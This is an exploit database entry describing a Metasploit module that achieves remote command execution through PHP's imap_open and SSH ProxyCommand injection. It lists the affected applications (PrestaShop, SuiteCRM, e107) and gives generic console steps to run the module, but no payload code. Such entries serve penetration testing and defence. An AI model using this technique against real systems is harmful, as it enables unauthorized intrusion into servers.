Vulnerability & Exploit Database

Back to search

php imap_open Remote Code Execution

The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand option can be passed from imap_open to execute arbitrary commands. While many custom applications may use imap_open, this exploit works against the following applications: e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use. Prestashop exploitation requires the admin URI, and administrator credentials. suiteCRM/e107/hostcms require administrator credentials.

Free Metasploit Download

Get your copy of the world's leading penetration testing tool

 Download Now

Module Name

exploit/linux/http/php_imap_open_rce

Authors

  • Anton Lopanitsyn
  • Twoster
  • h00die

References

Targets

  • prestashop
  • suitecrm
  • e107v2
  • custom

Platforms

  • unix

Architectures

  • cmd

Reliability

Development

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/linux/http/php_imap_open_rce msf exploit(php_imap_open_rce) > show targets ...targets... msf exploit(php_imap_open_rce) > set TARGET <target-id> msf exploit(php_imap_open_rce) > show options ...show and set options... msf exploit(php_imap_open_rce) > exploit